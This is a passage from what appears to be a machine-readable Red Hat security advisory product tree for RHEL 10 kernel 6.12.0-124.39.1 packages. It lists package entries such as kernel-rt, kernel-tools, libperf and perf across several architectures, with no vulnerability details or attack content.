"name": "kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "libperf-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "perf-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "perf-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
